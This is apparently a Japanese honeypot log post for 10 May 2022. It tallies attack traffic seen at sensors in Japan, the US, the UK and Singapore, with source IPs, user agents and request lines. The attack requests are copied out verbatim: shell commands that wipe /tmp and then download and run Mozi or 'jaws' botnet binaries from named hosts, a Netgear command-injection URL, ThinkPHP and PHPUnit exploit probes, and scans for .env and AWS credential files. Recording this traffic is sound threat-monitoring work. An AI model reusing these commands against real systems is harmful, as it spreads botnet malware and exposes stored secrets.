2022/05/10 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/05/10分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.awsへのスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget jx.qingdaosheng.com/jaws;
sh /tmp/jaws

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
aiohttpによるスキャン行為
Laravelへのスキャン行為
5.188.210.227に関する不正通信
85.206.160.115に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://210.89.39.104:57591/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
JBossの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Laravelへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget jx.qingdaosheng.com/jaws;
sh /tmp/jaws

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
/.gitへのスキャン行為
Laravelへのスキャン行為
85.206.160.115に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  a.tigoinari.tk/arm7;
sh /tmp/arm7

cd /tmp;
rm -rf *;
wget  cnc.krakenbit.net/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 209.141.59.94/jaws;
sh /tmp/jaws

他

アクセス数推移

JP：総アクセス数：222 (前日比：158)
US：総アクセス数：71 (前日比：-95)
UK：総アクセス数：49 (前日比：-231)
SG：総アクセス数：76 (前日比：-347)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	5.252.194.39	Russia
1	18.207.135.238	United States
1	20.62.13.13	United States
151	20.89.16.104	United States
1	20.126.42.244	United States
1	41.142.90.62	Morocco
6	45.9.20.101	Russia
1	45.61.188.169	United States
1	45.134.144.84	Hong Kong
1	46.249.33.53	Netherlands
1	62.233.50.179	Russia
2	89.248.165.24	United Kingdom
11	95.214.235.205	Ukraine
1	103.183.33.127	private ip address
1	103.192.80.142	New Zealand
1	107.189.162.183	United States
2	109.237.103.118	Russia
1	115.135.153.234	Malaysia
2	121.46.25.189	China
7	135.125.246.110	France
5	135.125.246.189	France
1	137.184.122.128	United States
1	139.162.145.250	Netherlands
2	157.245.70.127	United States
1	159.223.180.164	United States
1	165.227.178.254	United States
1	178.62.246.219	United States
8	185.254.196.217	Ukraine
1	192.241.201.192	United States
1	192.241.222.130	United States
1	197.61.241.226	Egypt
1	198.98.52.214	United States
1	205.210.31.12	United States
1	209.141.34.183	United States
1	212.30.33.157	Lebanon

UserAgent一覧

件数	UserAgent
10	`-`
1	`0xAbyssalDoesntExist`
1	`Hello, world`
1	`Mozila/5.0`
1	`Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36`
150	`Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
40	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
1	`Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)`
2	`Mozilla/5.0 zgrab/0.x`
1	`Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10`
2	`python-requests/2.22.0`
1	`python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.59.1.el7.x86_64`

リクエスト内容一覧

件数	Method	Request	Protocol
3		`\x03`
1		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01\x02`
2		`\x16\x03\x01`
1	GET	`/.aws/credentials`	HTTP/1.1
39	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`//.aws/credentials/phpinfo`	HTTP/1.1
1	GET	`//.env.1`	HTTP/1.1
1	GET	`//.env.bak`	HTTP/1.1
1	GET	`//.env.example.1`	HTTP/1.1
1	GET	`//.env.example.suspected`	HTTP/1.1
1	GET	`//.env.example`	HTTP/1.1
1	GET	`//.env.suspected`	HTTP/1.1
1	GET	`//.env.txt`	HTTP/1.1
1	GET	`//.env_bak`	HTTP/1.1
1	GET	`//.env_old`	HTTP/1.1
1	GET	`//.env`	HTTP/1.1
1	GET	`//.env~`	HTTP/1.1
1	GET	`///.env`	HTTP/1.1
1	GET	`//api/.env.example`	HTTP/1.1
1	GET	`//api/.env`	HTTP/1.1
2	GET	`//app/.env.example`	HTTP/1.1
2	GET	`//app/.env`	HTTP/1.1
1	GET	`//app/frontend/.env.example`	HTTP/1.1
1	GET	`//app/frontend/.env`	HTTP/1.1
1	GET	`//application/.env.example`	HTTP/1.1
1	GET	`//application/.env`	HTTP/1.1
1	GET	`//aws[.]yml`	HTTP/1.1
1	GET	`//awstats/.env.example`	HTTP/1.1
1	GET	`//awstats/.env`	HTTP/1.1
1	GET	`//back-end/app/.env.example`	HTTP/1.1
1	GET	`//back-end/app/.env`	HTTP/1.1
1	GET	`//backend/.env.example`	HTTP/1.1
1	GET	`//backend/.env`	HTTP/1.1
1	GET	`//backup/.env.example`	HTTP/1.1
1	GET	`//backup/.env`	HTTP/1.1
1	GET	`//bootstrap/.env.example`	HTTP/1.1
1	GET	`//bootstrap/.env`	HTTP/1.1
1	GET	`//build/.env.example`	HTTP/1.1
1	GET	`//build/.env`	HTTP/1.1
1	GET	`//config/.env.example`	HTTP/1.1
1	GET	`//config/.env`	HTTP/1.1
1	GET	`//config/aws.yml`	HTTP/1.1
2	GET	`//core/.env.example`	HTTP/1.1
2	GET	`//core/.env`	HTTP/1.1
1	GET	`//data/.env.example`	HTTP/1.1
1	GET	`//data/.env`	HTTP/1.1
1	GET	`//database/.env.example`	HTTP/1.1
1	GET	`//database/.env`	HTTP/1.1
1	GET	`//demo/.env.example`	HTTP/1.1
1	GET	`//demo/.env`	HTTP/1.1
1	GET	`//dev/.env.example`	HTTP/1.1
1	GET	`//dev/.env`	HTTP/1.1
1	GET	`//developer/.env.example`	HTTP/1.1
1	GET	`//developer/.env`	HTTP/1.1
1	GET	`//django_project_path/.env.example`	HTTP/1.1
1	GET	`//django_project_path/.env`	HTTP/1.1
1	GET	`//docker/.env.example`	HTTP/1.1
1	GET	`//docker/.env`	HTTP/1.1
1	GET	`//docs/.env.example`	HTTP/1.1
1	GET	`//docs/.env`	HTTP/1.1
2	GET	`//en/.env.example`	HTTP/1.1
2	GET	`//en/.env`	HTTP/1.1
1	GET	`//env/.env.example`	HTTP/1.1
1	GET	`//env/.env`	HTTP/1.1
1	GET	`//env[.]txt`	HTTP/1.1
1	GET	`//environments/.env.example`	HTTP/1.1
1	GET	`//environments/.env`	HTTP/1.1
1	GET	`//example/.env.example`	HTTP/1.1
1	GET	`//example/.env`	HTTP/1.1
1	GET	`//examples/.env.example`	HTTP/1.1
1	GET	`//examples/.env`	HTTP/1.1
1	GET	`//front-app/.env.example`	HTTP/1.1
1	GET	`//front-app/.env`	HTTP/1.1
1	GET	`//front-empathy/.env.example`	HTTP/1.1
1	GET	`//front-empathy/.env`	HTTP/1.1
1	GET	`//front-end/.env.example`	HTTP/1.1
1	GET	`//front-end/.env`	HTTP/1.1
1	GET	`//front/.env.example`	HTTP/1.1
1	GET	`//front/.env`	HTTP/1.1
1	GET	`//frontend/.env.example`	HTTP/1.1
1	GET	`//frontend/.env`	HTTP/1.1
1	GET	`//info[.]php`	HTTP/1.1
1	GET	`//js/.env.example`	HTTP/1.1
1	GET	`//js/.env`	HTTP/1.1
1	GET	`//laravel/.env.example`	HTTP/1.1
1	GET	`//laravel/.env`	HTTP/1.1
1	GET	`//local/.env.example`	HTTP/1.1
1	GET	`//local/.env`	HTTP/1.1
1	GET	`//log/.env.example`	HTTP/1.1
1	GET	`//log/.env`	HTTP/1.1
1	GET	`//mail/.env.example`	HTTP/1.1
1	GET	`//mail/.env`	HTTP/1.1
1	GET	`//phpinfo[.]php`	HTTP/1.1
1	GET	`//prod/.env.example`	HTTP/1.1
1	GET	`//prod/.env`	HTTP/1.1
1	GET	`//production/.env.example`	HTTP/1.1
1	GET	`//production/.env`	HTTP/1.1
1	GET	`//project/.env.example`	HTTP/1.1
1	GET	`//project/.env`	HTTP/1.1
1	GET	`//pub/.env.example`	HTTP/1.1
1	GET	`//pub/.env`	HTTP/1.1
2	GET	`//public/.env.example`	HTTP/1.1
2	GET	`//public/.env`	HTTP/1.1
1	GET	`//rest/.env.example`	HTTP/1.1
1	GET	`//rest/.env`	HTTP/1.1
1	GET	`//route/.env.example`	HTTP/1.1
1	GET	`//route/.env`	HTTP/1.1
1	GET	`//src/.env.example`	HTTP/1.1
1	GET	`//src/.env`	HTTP/1.1
1	GET	`//stag/.env.example`	HTTP/1.1
1	GET	`//stag/.env`	HTTP/1.1
1	GET	`//staging/.env.example`	HTTP/1.1
1	GET	`//staging/.env`	HTTP/1.1
1	GET	`//staging2/.env.example`	HTTP/1.1
2	GET	`//staging2/.env`	HTTP/1.1
1	GET	`//static/.env.example`	HTTP/1.1
1	GET	`//static/.env`	HTTP/1.1
1	GET	`//stats/.env.example`	HTTP/1.1
1	GET	`//stats/.env`	HTTP/1.1
1	GET	`//storage/.env.example`	HTTP/1.1
1	GET	`//storage/.env`	HTTP/1.1
1	GET	`//system/.env.example`	HTTP/1.1
1	GET	`//system/.env`	HTTP/1.1
1	GET	`//temp/.env.example`	HTTP/1.1
1	GET	`//temp/.env`	HTTP/1.1
1	GET	`//test/.env.example`	HTTP/1.1
1	GET	`//test/.env`	HTTP/1.1
1	GET	`//tests/.env.example`	HTTP/1.1
1	GET	`//tests/.env`	HTTP/1.1
1	GET	`//thumb/.env.example`	HTTP/1.1
1	GET	`//thumbs/.env.example`	HTTP/1.1
1	GET	`//tmp/.env.example`	HTTP/1.1
1	GET	`//tmp/.env`	HTTP/1.1
1	GET	`//v1/.env.example`	HTTP/1.1
1	GET	`//v1/.env`	HTTP/1.1
1	GET	`//v2/.env.example`	HTTP/1.1
1	GET	`//v2/.env`	HTTP/1.1
2	GET	`//vendor/.env.example`	HTTP/1.1
2	GET	`//vendor/.env`	HTTP/1.1
1	GET	`//vendor/laravel/.env.example`	HTTP/1.1
1	GET	`//vendor/laravel/.env`	HTTP/1.1
2	GET	`//web/.env.example`	HTTP/1.1
2	GET	`//web/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=ec8&psd=ec8`	HTTP/1.0
1	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/seeyon/index.jsp`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//dyn[.]epicgifs[.]net/test6956.php`	HTTP/1.1
1	GET	`http[:]//us[.]vansto[.]net/verify.txt`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/editBlackAndWhiteList`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.88.7.238	United States
1	5.188.210.227	Russia
4	20.211.101.106	United States
11	45.9.20.101	Russia
1	45.61.188.169	United States
10	51.79.29.48	Canada
1	52.58.74.10	United States
1	58.255.208.4	China
2	89.248.165.24	United Kingdom
1	89.248.165.29	United Kingdom
6	89.248.165.52	United Kingdom
1	107.189.162.183	United States
2	109.237.103.118	Russia
2	109.237.103.123	Russia
1	137.184.95.184	United States
1	137.184.122.128	United States
2	157.245.70.127	United States
2	162.142.125.220	United States
1	175.107.0.76	Pakistan
1	178.62.246.219	United States
9	185.254.196.223	Ukraine
1	192.241.213.6	United States
1	192.241.214.123	United States
1	192.241.215.240	United States
1	192.241.220.219	United States
1	193.56.29.124	United Kingdom
2	193.124.7.9	Czechia
1	205.210.31.31	United States
1	210.89.39.104	India
1	212.193.30.205	Czechia

UserAgent一覧

件数	UserAgent
19	`-`
2	`Go-http-client/1.1`
1	`Hello, world`
1	`Mozila/5.0`
4	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
26	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
3	`Mozilla/5.0 zgrab/0.x`
1	`Python/3.7 aiohttp/3.7.4.post0`

リクエスト内容一覧

件数	Method	Request	Protocol
4		`-`
1		`MGLNDD_34.68.118.83_80\n`
3		`\x03`
2		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01`
1	CONNECT	`85[.]206[.]160[.]115:80`	HTTP/1.1
1	CONNECT	`hotmail-com.olc[.]protection[.]outlook[.]com:25`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
28	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//210[.]89[.]39[.]104:57591/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
2	GET	`http[:]//example[.]com/`	HTTP/1.1
3	HEAD	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.122.80	Romania
1	27.43.202.170	China
1	31.45.240.114	Croatia
11	45.9.20.101	Russia
1	49.68.181.83	China
1	61.53.81.219	China
1	89.248.165.29	United Kingdom
2	101.68.211.3	China
1	106.111.52.148	China
2	109.237.103.118	Russia
1	119.180.105.185	China
2	156.221.50.26	Egypt
1	157.245.115.242	United States
1	165.232.184.49	United States
1	167.94.138.120	United States
1	178.62.246.219	United States
1	182.117.24.81	China
2	185.203.117.135	Cyprus
1	188.165.87.111	France
1	192.241.197.18	United States
1	192.241.214.37	United States
1	192.241.214.208	United States
1	192.241.220.8	United States
1	205.210.31.34	United States
11	208.21.208.2	United States

UserAgent一覧

件数	UserAgent
11	`-`
2	`Hello, world`
1	`Mozila/5.0`
2	`Mozilla 5/0`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
2	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0`
1	`Mozilla/5.0 Gecko/20100101`
3	`Mozilla/5.0 zgrab/0.x`
1	`python-requests/2.22.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
1		`\x03`
1		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01`
1	GET	`/.aws/credentials`	HTTP/1.1
2	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=rgjr7f98`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
2	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/env`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
2	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
2	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
1	GET	`/console/`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/invoker/readonly`	HTTP/1.1
1	GET	`/jenkins/login`	HTTP/1.1
1	GET	`/login`	HTTP/1.1
3	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/script`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]43[.]202[.]170:50920/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/users/sign_in`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/phpunit.xml`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wp-login.php`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/_ignition/execute-solution`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
2	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.62.13.13	United States
2	20.92.243.94	United States
1	23.129.64.133	United States
1	34.201.84.130	United States
1	40.113.200.245	United States
2	40.113.247.75	United States
11	45.9.20.101	Russia
1	45.169.13.173	Brazil
1	46.249.33.53	Netherlands
5	50.31.21.9	United States
10	51.79.29.48	Canada
1	62.122.97.50	Russia
2	89.248.165.24	United Kingdom
2	89.248.165.29	United Kingdom
6	89.248.165.52	United Kingdom
4	94.102.49.193	United Kingdom
1	103.76.166.169	India
2	109.237.103.118	Russia
2	109.237.103.123	Russia
1	134.209.40.100	United States
1	137.184.95.184	United States
1	137.184.122.128	United States
1	139.162.145.250	Netherlands
1	167.94.138.60	United States
1	183.136.225.42	China
1	185.220.100.241	Germany
8	185.254.196.223	Ukraine
1	192.241.212.131	United States
1	192.241.219.161	United States
1	205.210.31.20	United States
1	206.189.224.36	United States
1	209.141.34.183	United States

UserAgent一覧

件数	UserAgent
27	`-`
1	`Hello, world`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
5	`Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52`
24	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
5		`-`
4		`\x03`
2		`\x16\x03\x01\x01D\x01`
5		`\x16\x03\x01\x02`
2		`\x16\x03\x01`
1	CONNECT	`85[.]206[.]160[.]115:80`	HTTP/1.1
1	CONNECT	`hotmail-com.olc[.]protection[.]outlook[.]com:25`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
23	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/console/`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/nmaplowercheck1652115626`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/arm7;sh+/tmp/arm7`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ cnc.krakenbit.net/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+209[.]141[.]59[.]94/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0